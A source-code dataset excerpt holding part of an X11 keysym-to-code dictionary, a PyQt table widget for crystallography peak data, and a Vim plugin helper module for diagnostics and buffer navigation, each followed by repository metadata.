'Hangul_WEO': 0x0ecd,
'Hangul_WE': 0x0ece,
'Hangul_WI': 0x0ecf,
'Hangul_YU': 0x0ed0,
'Hangul_EU': 0x0ed1,
'Hangul_YI': 0x0ed2,
'Hangul_I': 0x0ed3,
'Hangul_J_Kiyeog': 0x0ed4,
'Hangul_J_SsangKiyeog': 0x0ed5,
'Hangul_J_KiyeogSios': 0x0ed6,
'Hangul_J_Nieun': 0x0ed7,
'Hangul_J_NieunJieuj': 0x0ed8,
'Hangul_J_NieunHieuh': 0x0ed9,
'Hangul_J_Dikeud': 0x0eda,
'Hangul_J_Rieul': 0x0edb,
'Hangul_J_RieulKiyeog': 0x0edc,
'Hangul_J_RieulMieum': 0x0edd,
'Hangul_J_RieulPieub': 0x0ede,
'Hangul_J_RieulSios': 0x0edf,
'Hangul_J_RieulTieut': 0x0ee0,
'Hangul_J_RieulPhieuf': 0x0ee1,
'Hangul_J_RieulHieuh': 0x0ee2,
'Hangul_J_Mieum': 0x0ee3,
'Hangul_J_Pieub': 0x0ee4,
'Hangul_J_PieubSios': 0x0ee5,
'Hangul_J_Sios': 0x0ee6,
'Hangul_J_SsangSios': 0x0ee7,
'Hangul_J_Ieung': 0x0ee8,
'Hangul_J_Jieuj': 0x0ee9,
'Hangul_J_Cieuc': 0x0eea,
'Hangul_J_Khieuq': 0x0eeb,
'Hangul_J_Tieut': 0x0eec,
'Hangul_J_Phieuf': 0x0eed,
'Hangul_J_Hieuh': 0x0eee,
'Hangul_RieulYeorinHieuh': 0x0eef,
'Hangul_SunkyeongeumMieum': 0x0ef0,
'Hangul_SunkyeongeumPieub': 0x0ef1,
'Hangul_PanSios': 0x0ef2,
'Hangul_KkogjiDalrinIeung': 0x0ef3,
'Hangul_SunkyeongeumPhieuf': 0x0ef4,
'Hangul_YeorinHieuh': 0x0ef5,
'Hangul_AraeA': 0x0ef6,
'Hangul_AraeAE': 0x0ef7,
'Hangul_J_PanSios': 0x0ef8,
'Hangul_J_KkogjiDalrinIeung': 0x0ef9,
'Hangul_J_YeorinHieuh': 0x0efa,
'Korean_Won': 0x0eff,
'Armenian_ligature_ew': 0x1000587,
'Armenian_full_stop': 0x1000589,
'Armenian_verjaket': 0x1000589,
'Armenian_separation_mark': 0x100055d,
'Armenian_but': 0x100055d,
'Armenian_hyphen': 0x100058a,
'Armenian_yentamna': 0x100058a,
'Armenian_exclam': 0x100055c,
'Armenian_amanak': 0x100055c,
'Armenian_accent': 0x100055b,
'Armenian_shesht': 0x100055b,
'Armenian_question': 0x100055e,
'Armenian_paruyk': 0x100055e,
'Armenian_AYB': 0x1000531,
'Armenian_ayb': 0x1000561,
'Armenian_BEN': 0x1000532,
'Armenian_ben': 0x1000562,
'Armenian_GIM': 0x1000533,
'Armenian_gim': 0x1000563,
'Armenian_DA': 0x1000534,
'Armenian_da': 0x1000564,
'Armenian_YECH': 0x1000535,
'Armenian_yech': 0x1000565,
'Armenian_ZA': 0x1000536,
'Armenian_za': 0x1000566,
'Armenian_E': 0x1000537,
'Armenian_e': 0x1000567,
'Armenian_AT': 0x1000538,
'Armenian_at': 0x1000568,
'Armenian_TO': 0x1000539,
'Armenian_to': 0x1000569,
'Armenian_ZHE': 0x100053a,
'Armenian_zhe': 0x100056a,
'Armenian_INI': 0x100053b,
'Armenian_ini': 0x100056b,
'Armenian_LYUN': 0x100053c,
'Armenian_lyun': 0x100056c,
'Armenian_KHE': 0x100053d,
'Armenian_khe': 0x100056d,
'Armenian_TSA': 0x100053e,
'Armenian_tsa': 0x100056e,
'Armenian_KEN': 0x100053f,
'Armenian_ken': 0x100056f,
'Armenian_HO': 0x1000540,
'Armenian_ho': 0x1000570,
'Armenian_DZA': 0x1000541,
'Armenian_dza': 0x1000571,
'Armenian_GHAT': 0x1000542,
'Armenian_ghat': 0x1000572,
'Armenian_TCHE': 0x1000543,
'Armenian_tche': 0x1000573,
'Armenian_MEN': 0x1000544,
'Armenian_men': 0x1000574,
'Armenian_HI': 0x1000545,
'Armenian_hi': 0x1000575,
'Armenian_NU': 0x1000546,
'Armenian_nu': 0x1000576,
'Armenian_SHA': 0x1000547,
'Armenian_sha': 0x1000577,
'Armenian_VO': 0x1000548,
'Armenian_vo': 0x1000578,
'Armenian_CHA': 0x1000549,
'Armenian_cha': 0x1000579,
'Armenian_PE': 0x100054a,
'Armenian_pe': 0x100057a,
'Armenian_JE': 0x100054b,
'Armenian_je': 0x100057b,
'Armenian_RA': 0x100054c,
'Armenian_ra': 0x100057c,
'Armenian_SE': 0x100054d,
'Armenian_se': 0x100057d,
'Armenian_VEV': 0x100054e,
'Armenian_vev': 0x100057e,
'Armenian_TYUN': 0x100054f,
'Armenian_tyun': 0x100057f,
'Armenian_RE': 0x1000550,
'Armenian_re': 0x1000580,
'Armenian_TSO': 0x1000551,
'Armenian_tso': 0x1000581,
'Armenian_VYUN': 0x1000552,
'Armenian_vyun': 0x1000582,
'Armenian_PYUR': 0x1000553,
'Armenian_pyur': 0x1000583,
'Armenian_KE': 0x1000554,
'Armenian_ke': 0x1000584,
'Armenian_O': 0x1000555,
'Armenian_o': 0x1000585,
'Armenian_FE': 0x1000556,
'Armenian_fe': 0x1000586,
'Armenian_apostrophe': 0x100055a,
'Georgian_an': 0x10010d0,
'Georgian_ban': 0x10010d1,
'Georgian_gan': 0x10010d2,
'Georgian_don': 0x10010d3,
'Georgian_en': 0x10010d4,
'Georgian_vin': 0x10010d5,
'Georgian_zen': 0x10010d6,
'Georgian_tan': 0x10010d7,
'Georgian_in': 0x10010d8,
'Georgian_kan': 0x10010d9,
'Georgian_las': 0x10010da,
'Georgian_man': 0x10010db,
'Georgian_nar': 0x10010dc,
'Georgian_on': 0x10010dd,
'Georgian_par': 0x10010de,
'Georgian_zhar': 0x10010df,
'Georgian_rae': 0x10010e0,
'Georgian_san': 0x10010e1,
'Georgian_tar': 0x10010e2,
'Georgian_un': 0x10010e3,
'Georgian_phar': 0x10010e4,
'Georgian_khar': 0x10010e5,
'Georgian_ghan': 0x10010e6,
'Georgian_qar': 0x10010e7,
'Georgian_shin': 0x10010e8,
'Georgian_chin': 0x10010e9,
'Georgian_can': 0x10010ea,
'Georgian_jil': 0x10010eb,
'Georgian_cil': 0x10010ec,
'Georgian_char': 0x10010ed,
'Georgian_xan': 0x10010ee,
'Georgian_jhan': 0x10010ef,
'Georgian_hae': 0x10010f0,
'Georgian_he': 0x10010f1,
'Georgian_hie': 0x10010f2,
'Georgian_we': 0x10010f3,
'Georgian_har': 0x10010f4,
'Georgian_hoe': 0x10010f5,
'Georgian_fi': 0x10010f6,
'Xabovedot': 0x1001e8a,
'Ibreve': 0x100012c,
'Zstroke': 0x10001b5,
'Gcaron': 0x10001e6,
'Ocaron': 0x10001d1,
'Obarred': 0x100019f,
'xabovedot': 0x1001e8b,
'ibreve': 0x100012d,
'zstroke': 0x10001b6,
'gcaron': 0x10001e7,
'ocaron': 0x10001d2,
'obarred': 0x1000275,
'SCHWA': 0x100018f,
'schwa': 0x1000259,
'Lbelowdot': 0x1001e36,
'lbelowdot': 0x1001e37,
'Abelowdot': 0x1001ea0,
'abelowdot': 0x1001ea1,
'Ahook': 0x1001ea2,
'ahook': 0x1001ea3,
'Acircumflexacute': 0x1001ea4,
'acircumflexacute': 0x1001ea5,
'Acircumflexgrave': 0x1001ea6,
'acircumflexgrave': 0x1001ea7,
'Acircumflexhook': 0x1001ea8,
'acircumflexhook': 0x1001ea9,
'Acircumflextilde': 0x1001eaa,
'acircumflextilde': 0x1001eab,
'Acircumflexbelowdot': 0x1001eac,
'acircumflexbelowdot': 0x1001ead,
'Abreveacute': 0x1001eae,
'abreveacute': 0x1001eaf,
'Abrevegrave': 0x1001eb0,
'abrevegrave': 0x1001eb1,
'Abrevehook': 0x1001eb2,
'abrevehook': 0x1001eb3,
'Abrevetilde': 0x1001eb4,
'abrevetilde': 0x1001eb5,
'Abrevebelowdot': 0x1001eb6,
'abrevebelowdot': 0x1001eb7,
'Ebelowdot': 0x1001eb8,
'ebelowdot': 0x1001eb9,
'Ehook': 0x1001eba,
'ehook': 0x1001ebb,
'Etilde': 0x1001ebc,
'etilde': 0x1001ebd,
'Ecircumflexacute': 0x1001ebe,
'ecircumflexacute': 0x1001ebf,
'Ecircumflexgrave': 0x1001ec0,
'ecircumflexgrave': 0x1001ec1,
'Ecircumflexhook': 0x1001ec2,
'ecircumflexhook': 0x1001ec3,
'Ecircumflextilde': 0x1001ec4,
'ecircumflextilde': 0x1001ec5,
'Ecircumflexbelowdot': 0x1001ec6,
'ecircumflexbelowdot': 0x1001ec7,
'Ihook': 0x1001ec8,
'ihook': 0x1001ec9,
'Ibelowdot': 0x1001eca,
'ibelowdot': 0x1001ecb,
'Obelowdot': 0x1001ecc,
'obelowdot': 0x1001ecd,
'Ohook': 0x1001ece,
'ohook': 0x1001ecf,
'Ocircumflexacute': 0x1001ed0,
'ocircumflexacute': 0x1001ed1,
'Ocircumflexgrave': 0x1001ed2,
'ocircumflexgrave': 0x1001ed3,
'Ocircumflexhook': 0x1001ed4,
'ocircumflexhook': 0x1001ed5,
'Ocircumflextilde': 0x1001ed6,
'ocircumflextilde': 0x1001ed7,
'Ocircumflexbelowdot': 0x1001ed8,
'ocircumflexbelowdot': 0x1001ed9,
'Ohornacute': 0x1001eda,
'ohornacute': 0x1001edb,
'Ohorngrave': 0x1001edc,
'ohorngrave': 0x1001edd,
'Ohornhook': 0x1001ede,
'ohornhook': 0x1001edf,
'Ohorntilde': 0x1001ee0,
'ohorntilde': 0x1001ee1,
'Ohornbelowdot': 0x1001ee2,
'ohornbelowdot': 0x1001ee3,
'Ubelowdot': 0x1001ee4,
'ubelowdot': 0x1001ee5,
'Uhook': 0x1001ee6,
'uhook': 0x1001ee7,
'Uhornacute': 0x1001ee8,
'uhornacute': 0x1001ee9,
'Uhorngrave': 0x1001eea,
'uhorngrave': 0x1001eeb,
'Uhornhook': 0x1001eec,
'uhornhook': 0x1001eed,
'Uhorntilde': 0x1001eee,
'uhorntilde': 0x1001eef,
'Uhornbelowdot': 0x1001ef0,
'uhornbelowdot': 0x1001ef1,
'Ybelowdot': 0x1001ef4,
'ybelowdot': 0x1001ef5,
'Yhook': 0x1001ef6,
'yhook': 0x1001ef7,
'Ytilde': 0x1001ef8,
'ytilde': 0x1001ef9,
'Ohorn': 0x10001a0,
'ohorn': 0x10001a1,
'Uhorn': 0x10001af,
'uhorn': 0x10001b0,
'EcuSign': 0x10020a0,
'ColonSign': 0x10020a1,
'CruzeiroSign': 0x10020a2,
'FFrancSign': 0x10020a3,
'LiraSign': 0x10020a4,
'MillSign': 0x10020a5,
'NairaSign': 0x10020a6,
'PesetaSign': 0x10020a7,
'RupeeSign': 0x10020a8,
'WonSign': 0x10020a9,
'NewSheqelSign': 0x10020aa,
'DongSign': 0x10020ab,
'EuroSign': 0x20ac,
'zerosuperior': 0x1002070,
'foursuperior': 0x1002074,
'fivesuperior': 0x1002075,
'sixsuperior': 0x1002076,
'sevensuperior': 0x1002077,
'eightsuperior': 0x1002078,
'ninesuperior': 0x1002079,
'zerosubscript': 0x1002080,
'onesubscript': 0x1002081,
'twosubscript': 0x1002082,
'threesubscript': 0x1002083,
'foursubscript': 0x1002084,
'fivesubscript': 0x1002085,
'sixsubscript': 0x1002086,
'sevensubscript': 0x1002087,
'eightsubscript': 0x1002088,
'ninesubscript': 0x1002089,
'partdifferential': 0x1002202,
'emptyset': 0x1002205,
'elementof': 0x1002208,
'notelementof': 0x1002209,
'containsas': 0x100220B,
'squareroot': 0x100221A,
'cuberoot': 0x100221B,
'fourthroot': 0x100221C,
'dintegral': 0x100222C,
'tintegral': 0x100222D,
'because': 0x1002235,
'approxeq': 0x1002248,
'notapproxeq': 0x1002247,
'notidentical': 0x1002262,
'stricteq': 0x1002263,
'braille_dot_1': 0xfff1,
'braille_dot_2': 0xfff2,
'braille_dot_3': 0xfff3,
'braille_dot_4': 0xfff4,
'braille_dot_5': 0xfff5,
'braille_dot_6': 0xfff6,
'braille_dot_7': 0xfff7,
'braille_dot_8': 0xfff8,
'braille_dot_9': 0xfff9,
'braille_dot_10': 0xfffa,
'braille_blank': 0x1002800,
'braille_dots_1': 0x1002801,
'braille_dots_2': 0x1002802,
'braille_dots_12': 0x1002803,
'braille_dots_3': 0x1002804,
'braille_dots_13': 0x1002805,
'braille_dots_23': 0x1002806,
'braille_dots_123': 0x1002807,
'braille_dots_4': 0x1002808,
'braille_dots_14': 0x1002809,
'braille_dots_24': 0x100280a,
'braille_dots_124': 0x100280b,
'braille_dots_34': 0x100280c,
'braille_dots_134': 0x100280d,
'braille_dots_234': 0x100280e,
'braille_dots_1234': 0x100280f,
'braille_dots_5': 0x1002810,
'braille_dots_15': 0x1002811,
'braille_dots_25': 0x1002812,
'braille_dots_125': 0x1002813,
'braille_dots_35': 0x1002814,
'braille_dots_135': 0x1002815,
'braille_dots_235': 0x1002816,
'braille_dots_1235': 0x1002817,
'braille_dots_45': 0x1002818,
'braille_dots_145': 0x1002819,
'braille_dots_245': 0x100281a,
'braille_dots_1245': 0x100281b,
'braille_dots_345': 0x100281c,
'braille_dots_1345': 0x100281d,
'braille_dots_2345': 0x100281e,
'braille_dots_12345': 0x100281f,
'braille_dots_6': 0x1002820,
'braille_dots_16': 0x1002821,
'braille_dots_26': 0x1002822,
'braille_dots_126': 0x1002823,
'braille_dots_36': 0x1002824,
'braille_dots_136': 0x1002825,
'braille_dots_236': 0x1002826,
'braille_dots_1236': 0x1002827,
'braille_dots_46': 0x1002828,
'braille_dots_146': 0x1002829,
'braille_dots_246': 0x100282a,
'braille_dots_1246': 0x100282b,
'braille_dots_346': 0x100282c,
'braille_dots_1346': 0x100282d,
'braille_dots_2346': 0x100282e,
'braille_dots_12346': 0x100282f,
'braille_dots_56': 0x1002830,
'braille_dots_156': 0x1002831,
'braille_dots_256': 0x1002832,
'braille_dots_1256': 0x1002833,
'braille_dots_356': 0x1002834,
'braille_dots_1356': 0x1002835,
'braille_dots_2356': 0x1002836,
'braille_dots_12356': 0x1002837,
'braille_dots_456': 0x1002838,
'braille_dots_1456': 0x1002839,
'braille_dots_2456': 0x100283a,
'braille_dots_12456': 0x100283b,
'braille_dots_3456': 0x100283c,
'braille_dots_13456': 0x100283d,
'braille_dots_23456': 0x100283e,
'braille_dots_123456': 0x100283f,
'braille_dots_7': 0x1002840,
'braille_dots_17': 0x1002841,
'braille_dots_27': 0x1002842,
'braille_dots_127': 0x1002843,
'braille_dots_37': 0x1002844,
'braille_dots_137': 0x1002845,
'braille_dots_237': 0x1002846,
'braille_dots_1237': 0x1002847,
'braille_dots_47': 0x1002848,
'braille_dots_147': 0x1002849,
'braille_dots_247': 0x100284a,
'braille_dots_1247': 0x100284b,
'braille_dots_347': 0x100284c,
'braille_dots_1347': 0x100284d,
'braille_dots_2347': 0x100284e,
'braille_dots_12347': 0x100284f,
'braille_dots_57': 0x1002850,
'braille_dots_157': 0x1002851,
'braille_dots_257': 0x1002852,
'braille_dots_1257': 0x1002853,
'braille_dots_357': 0x1002854,
'braille_dots_1357': 0x1002855,
'braille_dots_2357': 0x1002856,
'braille_dots_12357': 0x1002857,
'braille_dots_457': 0x1002858,
'braille_dots_1457': 0x1002859,
'braille_dots_2457': 0x100285a,
'braille_dots_12457': 0x100285b,
'braille_dots_3457': 0x100285c,
'braille_dots_13457': 0x100285d,
'braille_dots_23457': 0x100285e,
'braille_dots_123457': 0x100285f,
'braille_dots_67': 0x1002860,
'braille_dots_167': 0x1002861,
'braille_dots_267': 0x1002862,
'braille_dots_1267': 0x1002863,
'braille_dots_367': 0x1002864,
'braille_dots_1367': 0x1002865,
'braille_dots_2367': 0x1002866,
'braille_dots_12367': 0x1002867,
'braille_dots_467': 0x1002868,
'braille_dots_1467': 0x1002869,
'braille_dots_2467': 0x100286a,
'braille_dots_12467': 0x100286b,
'braille_dots_3467': 0x100286c,
'braille_dots_13467': 0x100286d,
'braille_dots_23467': 0x100286e,
'braille_dots_123467': 0x100286f,
'braille_dots_567': 0x1002870,
'braille_dots_1567': 0x1002871,
'braille_dots_2567': 0x1002872,
'braille_dots_12567': 0x1002873,
'braille_dots_3567': 0x1002874,
'braille_dots_13567': 0x1002875,
'braille_dots_23567': 0x1002876,
'braille_dots_123567': 0x1002877,
'braille_dots_4567': 0x1002878,
'braille_dots_14567': 0x1002879,
'braille_dots_24567': 0x100287a,
'braille_dots_124567': 0x100287b,
'braille_dots_34567': 0x100287c,
'braille_dots_134567': 0x100287d,
'braille_dots_234567': 0x100287e,
'braille_dots_1234567': 0x100287f,
'braille_dots_8': 0x1002880,
'braille_dots_18': 0x1002881,
'braille_dots_28': 0x1002882,
'braille_dots_128': 0x1002883,
'braille_dots_38': 0x1002884,
'braille_dots_138': 0x1002885,
'braille_dots_238': 0x1002886,
'braille_dots_1238': 0x1002887,
'braille_dots_48': 0x1002888,
'braille_dots_148': 0x1002889,
'braille_dots_248': 0x100288a,
'braille_dots_1248': 0x100288b,
'braille_dots_348': 0x100288c,
'braille_dots_1348': 0x100288d,
'braille_dots_2348': 0x100288e,
'braille_dots_12348': 0x100288f,
'braille_dots_58': 0x1002890,
'braille_dots_158': 0x1002891,
'braille_dots_258': 0x1002892,
'braille_dots_1258': 0x1002893,
'braille_dots_358': 0x1002894,
'braille_dots_1358': 0x1002895,
'braille_dots_2358': 0x1002896,
'braille_dots_12358': 0x1002897,
'braille_dots_458': 0x1002898,
'braille_dots_1458': 0x1002899,
'braille_dots_2458': 0x100289a,
'braille_dots_12458': 0x100289b,
'braille_dots_3458': 0x100289c,
'braille_dots_13458': 0x100289d,
'braille_dots_23458': 0x100289e,
'braille_dots_123458': 0x100289f,
'braille_dots_68': 0x10028a0,
'braille_dots_168': 0x10028a1,
'braille_dots_268': 0x10028a2,
'braille_dots_1268': 0x10028a3,
'braille_dots_368': 0x10028a4,
'braille_dots_1368': 0x10028a5,
'braille_dots_2368': 0x10028a6,
'braille_dots_12368': 0x10028a7,
'braille_dots_468': 0x10028a8,
'braille_dots_1468': 0x10028a9,
'braille_dots_2468': 0x10028aa,
'braille_dots_12468': 0x10028ab,
'braille_dots_3468': 0x10028ac,
'braille_dots_13468': 0x10028ad,
'braille_dots_23468': 0x10028ae,
'braille_dots_123468': 0x10028af,
'braille_dots_568': 0x10028b0,
'braille_dots_1568': 0x10028b1,
'braille_dots_2568': 0x10028b2,
'braille_dots_12568': 0x10028b3,
'braille_dots_3568': 0x10028b4,
'braille_dots_13568': 0x10028b5,
'braille_dots_23568': 0x10028b6,
'braille_dots_123568': 0x10028b7,
'braille_dots_4568': 0x10028b8,
'braille_dots_14568': 0x10028b9,
'braille_dots_24568': 0x10028ba,
'braille_dots_124568': 0x10028bb,
'braille_dots_34568': 0x10028bc,
'braille_dots_134568': 0x10028bd,
'braille_dots_234568': 0x10028be,
'braille_dots_1234568': 0x10028bf,
'braille_dots_78': 0x10028c0,
'braille_dots_178': 0x10028c1,
'braille_dots_278': 0x10028c2,
'braille_dots_1278': 0x10028c3,
'braille_dots_378': 0x10028c4,
'braille_dots_1378': 0x10028c5,
'braille_dots_2378': 0x10028c6,
'braille_dots_12378': 0x10028c7,
'braille_dots_478': 0x10028c8,
'braille_dots_1478': 0x10028c9,
'braille_dots_2478': 0x10028ca,
'braille_dots_12478': 0x10028cb,
'braille_dots_3478': 0x10028cc,
'braille_dots_13478': 0x10028cd,
'braille_dots_23478': 0x10028ce,
'braille_dots_123478': 0x10028cf,
'braille_dots_578': 0x10028d0,
'braille_dots_1578': 0x10028d1,
'braille_dots_2578': 0x10028d2,
'braille_dots_12578': 0x10028d3,
'braille_dots_3578': 0x10028d4,
'braille_dots_13578': 0x10028d5,
'braille_dots_23578': 0x10028d6,
'braille_dots_123578': 0x10028d7,
'braille_dots_4578': 0x10028d8,
'braille_dots_14578': 0x10028d9,
'braille_dots_24578': 0x10028da,
'braille_dots_124578': 0x10028db,
'braille_dots_34578': 0x10028dc,
'braille_dots_134578': 0x10028dd,
'braille_dots_234578': 0x10028de,
'braille_dots_1234578': 0x10028df,
'braille_dots_678': 0x10028e0,
'braille_dots_1678': 0x10028e1,
'braille_dots_2678': 0x10028e2,
'braille_dots_12678': 0x10028e3,
'braille_dots_3678': 0x10028e4,
'braille_dots_13678': 0x10028e5,
'braille_dots_23678': 0x10028e6,
'braille_dots_123678': 0x10028e7,
'braille_dots_4678': 0x10028e8,
'braille_dots_14678': 0x10028e9,
'braille_dots_24678': 0x10028ea,
'braille_dots_124678': 0x10028eb,
'braille_dots_34678': 0x10028ec,
'braille_dots_134678': 0x10028ed,
'braille_dots_234678': 0x10028ee,
'braille_dots_1234678': 0x10028ef,
'braille_dots_5678': 0x10028f0,
'braille_dots_15678': 0x10028f1,
'braille_dots_25678': 0x10028f2,
'braille_dots_125678': 0x10028f3,
'braille_dots_35678': 0x10028f4,
'braille_dots_135678': 0x10028f5,
'braille_dots_235678': 0x10028f6,
'braille_dots_1235678': 0x10028f7,
'braille_dots_45678': 0x10028f8,
'braille_dots_145678': 0x10028f9,
'braille_dots_245678': 0x10028fa,
'braille_dots_1245678': 0x10028fb,
'braille_dots_345678': 0x10028fc,
'braille_dots_1345678': 0x10028fd,
'braille_dots_2345678': 0x10028fe,
'braille_dots_12345678': 0x10028ff,
}
| mit | -1,670,757,064,279,498,500 | 27.248759 | 42 | 0.617422 | false |
comptech/atrex | Software/myPeakTableWidget.py | 1 | 3328 |
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.uic import *
from myPeaks import *
from myDetector import *
from peakEditDlg import *
class myPeakTableWidget (QTableWidget) :
numPeaks = 0
#headList = QString("Num;H;K;L;len(XYZ)^-1;2-theta;Gonio[5];nu").split(";")
headList = ['Num','H','K','L','len(xyz)^-1','2-theta','Gonio[5]','nu']
myDet = 0
peaks = 0
imname =''
numPeaks = 0
def __init__(self, parent=None) :
QTableWidget.__init__(self, parent)
hhead = QHeaderView (Qt.Horizontal)
hhead.setVisible(False)
self.setHorizontalHeader (hhead)
self.setColumnCount (8)
self.setRowCount(8)
#self.setHorizontalHeader (hhead)
# peak table widget
#hhead.setVisible(True)
self.setHorizontalHeaderLabels(self.headList)
#for i in range(8) :
#for j in range(8) :
#newItem = QTableWidgetItem("%d %d"%(j,i))
#self.setItem(i, j, newItem)
self.setSelectionBehavior (QAbstractItemView.SelectRows)
self.cellDoubleClicked.connect (self.peakEdit)
def setImageFileName (self, imname) :
self.imfile = imname
def setDetector (self, det) :
self.myDet = det
def setPeaks (self, peaks) :
self.peaks = peaks
count = 0
self.setRowCount (len(peaks))
for p in peaks :
# redo this to match IDL routine
str = '%d'%count
self.setItem (count, 0, QTableWidgetItem(str))
str = '%d'%p.HKL[0]
self.setItem (count, 1, QTableWidgetItem(str))
str = '%d'%p.HKL[1]
self.setItem (count, 2, QTableWidgetItem(str))
str = '%d'%p.HKL[2]
self.setItem (count, 3, QTableWidgetItem(str))
val = vlength (p.XYZ)
xy = p.DetXY
str = '%.2f'%(1./val)
self.setItem (count, 4, QTableWidgetItem(str))
str = '%.2f'%p.tth
self.setItem (count, 5, QTableWidgetItem(str))
#tthval = self.myDet.calculate_tth_from_pixels(xy, self.myDet.gonio)
# xyz = self.myDet.calculate_xyz_from_pixels (xy, self.myDet.gonio)
str = '%.3f'%p.Gonio[5]
self.setItem (count, 6, QTableWidgetItem(str))
str = '%.3f'%p.nu
self.setItem (count, 7, QTableWidgetItem(str))
count = count + 1
self.numPeaks = count
self.resizeColumnsToContents()
def addPeak (self, peak) :
xy = peak.DetXY
str = '%d'%xy[0]
self.setItem (self.numPeaks, 0, QTableWidgetItem(str))
str = '%d'%xy[1]
self.setItem (self.numPeaks, 1, QTableWidgetItem(str))
tthval = self.myDet.calculate_tth_from_pixels(xy, self.myDet.gonio)
str = '%f'%tthval
self.setItem (self.numPeaks, 2, QTableWidgetItem(str))
self.numPeaks += 1
""" peakEdit
method called by dbl clicking of the peakTableWidget item
will open a dialog to further edit the peak parameters
"""
def peakEdit (self, row, col):
#open peakEditDlg
curpeak = self.peaks[row]
pedit_dlg = peakEditDlg (curpeak, row)
pedit_dlg.setImageFile (self.imfile)
pedit_dlg.exec_()
| lgpl-3.0 | -1,797,646,228,205,733,000 | 31.627451 | 80 | 0.574219 | false |
Chilledheart/windycode | python/vimsupport.py | 1 | 6475 | #!/usr/bin/env python
import vim
import os
# Given an object, returns a str object that's utf-8 encoded.
def ToUtf8IfNeeded(value):
if isinstance(value, unicode):
return value.encode('utf8')
if isinstance(value, str):
return value
return str(value)
def PresentYesOrNoDialog(message):
return int(vim.eval('confirm("%s", "&Yes\n&No")' % message)) == 1;
def CurrentLineAndColumn():
"""Returns the 0-based current line and 0-based current column."""
# See the comment in CurrentColumn about the calculation for the line and
# column number
line, column = vim.current.window.cursor
return line, column + 1
def CurrentLine():
return vim.current.line
def CurrentBuffer():
return vim.current.buffer
def CurrentBufferFileName():
file_name = vim.current.buffer.name
if file_name == None:
EchoMessage('empty buffer name')
return file_name
def CurrentFileTypes():
return vim.eval("&filetype").split('.')
#TODO refine this
def EscapeForVim(text):
return text.replace("'", "''")
def FiletypesForBuffer(buffer_object):
# NOTE: Getting &ft for other buffers only works when the buffer has been
# visited by the user at least once, which is true for modified buffers
return GetBufferOption(buffer_object, 'ft').split('.')
def GetBufferOption(buffer_object, option):
to_eval = 'getbufvar({0}, "&{1}")'.format(buffer_object.number, option)
return GetVariableValue(to_eval)
def GetVariableValue(variable):
return vim.eval(variable)
def GetBoolValue(variable):
return bool(int(vim.eval(variable)))
def GetIntValue(variable):
return int(vim.eval(variable))
def GetBufferNumberForFilename(filename, open_file_if_needed = True):
return GetIntValue(u"bufnr('{0}', {1})".format(
EscapeForVim(os.path.realpath(filename)),
int(open_file_if_needed)))
# clean all signs for existing buffer
# FIXME clean WdcSigns only
def UnplaceAllSigns():
buffer_num = vim.current.buffer.number
vim.command('sign unplace * buffer=%d' % buffer_num)
def PlaceSignForErrorMessage(buffer_num, index, diagnostic):
if diagnostic['severity'] >= 3:
sign_name = 'WdcError'
else:
sign_name = 'WdcWarning'
vim.command('sign place %d line=%d name=%s buffer=%d' % (index, diagnostic['lnum'], sign_name, buffer_num))
def PlaceSignForErrorMessageArray(diagnostics):
buffer_num = vim.current.buffer.number
index = 1
for line_num in diagnostics:
PlaceSignForErrorMessage(buffer_num, index, diagnostics[line_num])
index += 1
def ConvertDiagnosticsToQfList(diagnostics):
retval = []
num = len(diagnostics);
for i in xrange(0, num):
diagnostic = diagnostics[i]
location = diagnostic.location
line = location.line
column = location.column - 1
# when the error is "too many error occurs"
if line == 0 or column == 0:
continue;
retval.append({
'bufnr' : GetBufferNumberForFilename(location.file_name),
'lnum' : line,
'col' : column,
'text' : ToUtf8IfNeeded(diagnostic.spelling),
'full_text' : ToUtf8IfNeeded(diagnostic.full_spelling),
'type' : diagnostic.category,
'valid' : 1,
'severity' : diagnostic.severity
})
return retval
def EchoMessage(text):
for line in str(text).split('\n'):
vim.command('{0} \'{1}\''.format('echom', EscapeForVim(line)))
def EchoText(text):
for line in str(text).split('\n'):
vim.command('{0} \'{1}\''.format('echo', EscapeForVim(line)))
def EchoTextH(text):
for line in str(text).split('\n'):
vim.command('{0} \'{1}\''.format('echoh', EscapeForVim(line)))
def EchoTruncatedText(text):
width = int(vim.eval('&columns')) - 3
if width <= 0:
return
saved_ruler = vim.eval('&ruler')
saved_showcmd = vim.eval('&showcmd')
vim.command('set noruler noshowcmd')
truncated = str(text)[:width]
EchoText(truncated)
saved_ruler = vim.eval('&ruler')
saved_showcmd = vim.eval('&showcmd')
vim.command('let &ruler = %s' % saved_ruler)
vim.command('let &showcmd = %s' % saved_showcmd)
def ClearWdcSyntaxMatches():
matches = vim.eval('getmatches()')
for match in matches:
if match['group'].startswith('Wdc'):
vim.eval('matchdelete({0})'.format(match['id']))
def AddDiagnosticSyntaxMatch(line_num,
column_num,
line_end_num = None,
column_end_num = None,
is_error = True):
group = 'WdcErrorSection' if is_error else 'WdcWarningSection'
if not line_end_num:
line_end_num = line_num
line_num, column_num = LineAndColumnNumbersClamped(line_num, column_num)
line_end_num, column_end_num = LineAndColumnNumbersClamped(line_end_num,
column_end_num)
if not column_end_num:
return GetIntValue(
"matchadd('{0}', '\%{1}l\%{2}c')".format(group, line_num, column_num))
else:
return GetIntValue(
"matchadd('{0}', '\%{1}l\%{2}c\_.\\{{-}}\%{3}l\%{4}c')".format(
group, line_num, column_num, line_end_num, column_end_num))
def LineAndColumnNumbersClamped(line_num, column_num):
new_line_num = line_num
new_column_num = column_num
max_line = len(vim.current.buffer)
if line_num and line_num > max_line:
new_line_num = max_line
max_column = len(vim.current.buffer[new_line_num - 1])
if column_num and column_num > max_column:
new_column_num = max_column
return new_line_num, new_column_num
def GotoOpenedBuffer(filename, line, column):
filepath = os.path.realpath(filename)
for tab in vim.tabpages:
for win in tab.windows:
if win.buffer.name == filepath:
vim.current.tabpage = tab
vim.current.window = win
vim.current.window.cursor = (line, column - 1)
# Center the screen on the jumped-to location
vim.command('normal! zz')
return True
return False
def GotoBuffer(filename, line, column):
# Add an entry to the jumplist
vim.command("normal! m'")
if filename != CurrentBufferFileName():
if GotoOpenedBuffer(filename, line, column):
return
buf = vim.current.buffer;
usable = not buf.options['modified'] or buf.options['bufhidden']
if usable:
command = 'edit'
else:
command = 'split'
vim.command('keepjumps {0} {1}'.format(command, filename.replace( ' ' , r'\ ' )))
vim.current.window.cursor = (line, column - 1)
# Center the screen on the jumped-to location
vim.command('normal! zz')
| bsd-3-clause | -5,430,061,958,010,127,000 | 28.83871 | 109 | 0.658069 | false |
